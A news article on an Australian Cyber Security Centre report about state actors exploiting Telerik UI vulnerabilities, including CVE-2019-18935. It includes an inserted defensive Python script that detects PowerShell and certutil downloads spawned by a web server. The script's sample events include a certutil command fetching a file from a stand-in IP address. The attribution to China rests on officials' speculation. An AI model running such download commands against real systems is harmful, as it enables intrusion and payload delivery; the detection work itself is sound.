A 48-page report by the Australian Cyber Security Centre (ACSC), published on June 24, stated that a group of 'state actors' entered the Australian network to exploit vulnerabilities related to cryptojacking malware attacks.
According to the report, the actors exploited four vulnerabilities in Telerik UI, including CVE-2019-18935.
Blue Mockingbird Uses Telerik UI Vulnerability
Notably, the Blue Mockingbird malware gang recently used CVE-2019-18935 to infect systems with Monero mining software.
It has yet to be confirmed whether the attackers were able to install cryptojacking malware when they attacked the network. Cybercriminals commonly use this kind of malware because it lets them install crypto-mining applications within a corporate network.
The use of CVE-2019-18935 is somewhat similar to the Blue Mockingbird attacks, but that does not mean Blue Mockingbird was part of the recent cyberattack in Australia.
The ACSC identified the payloads that were mostly manipulated or damaged because the threat actors failed at the reverse shell. These were payloads that tried to execute a PowerShell reverse shell; payloads that tried to execute certutil.exe to download another payload; a payload that executed binary malware; and a payload that calculated the absolute path of the webroot.
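As a defender's illustration of the payload behaviours listed above, the following added example (not taken from the ACSC report or this article) flags process-creation events in which a web-server worker process launches PowerShell or uses certutil.exe to fetch a file. The `w3wp.exe` parent name, the pipe-separated event format and the sample events are assumptions constructed for the example.

```python
import re

# Assumption: the web application runs inside the IIS worker process.
WEB_PARENTS = {"w3wp.exe"}

# Child-process behaviours matching two of the payload types listed above.
RULES = [
    ("powershell_from_webserver", re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I)),
    ("certutil_download", re.compile(r"\bcertutil(\.exe)?\b.*(urlcache|https?://)", re.I)),
]

# Constructed sample events in a hypothetical "parent|image|command line" format.
SAMPLE_EVENTS = [
    r"services.exe|C:\Windows\System32\svchost.exe|svchost.exe -k netsvcs",
    r"w3wp.exe|C:\Windows\System32\cmd.exe|cmd.exe /c certutil.exe -urlcache -f http://198.51.100.7/a.txt C:\Windows\Temp\a.txt",
    r"w3wp.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -NoProfile -Command <constructed>",
    r"explorer.exe|C:\Windows\System32\certutil.exe|certutil.exe -hashfile report.pdf SHA256",
    r"w3wp.exe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe|csc.exe /noconfig @args.cmdline",
]

def basename(path):
    """Return the lower-cased file name of a Windows or POSIX style path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def parse_event(line):
    """Split one event line into parent name, image name and command line."""
    parent, image, cmdline = line.split("|", 2)
    return {"parent": basename(parent), "image": basename(image), "cmdline": cmdline}

def flag_events(lines):
    """Return (line index, matched rule names) for suspicious web-server children."""
    hits = []
    for n, line in enumerate(lines):
        ev = parse_event(line)
        if ev["parent"] not in WEB_PARENTS:
            continue  # only children of the web-server worker are in scope
        haystack = ev["image"] + " " + ev["cmdline"]
        matched = [name for name, rx in RULES if rx.search(haystack)]
        if matched:
            hits.append((n, matched))
    return hits

if __name__ == "__main__":
    for index, rules in flag_events(SAMPLE_EVENTS):
        print(index, rules)
```

The interactive certutil hash check and the ASP.NET compiler (`csc.exe`) started by the worker process are left unflagged, which keeps the rule focused on the reported behaviours rather than on every child process.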
PlugX Malware Also Used To Exploit Australian Network
The report further mentioned that one of the malware families the Australian government found was PlugX, which is used by a group of Chinese hackers who are supposedly connected with the Government of China.
According to Australian officials, there is a strong chance that China is behind this cyberattack, because the diplomatic tension between the two countries has been rising for a long time.
The officials suggested that this attack could have taken place because the Australian Government had earlier called for an investigation into COVID-19's origin, and the dragon nation's officials were not happy with it.
The Chinese officials stated that this investigation was a discriminatory accusation and reacted with trade retaliation.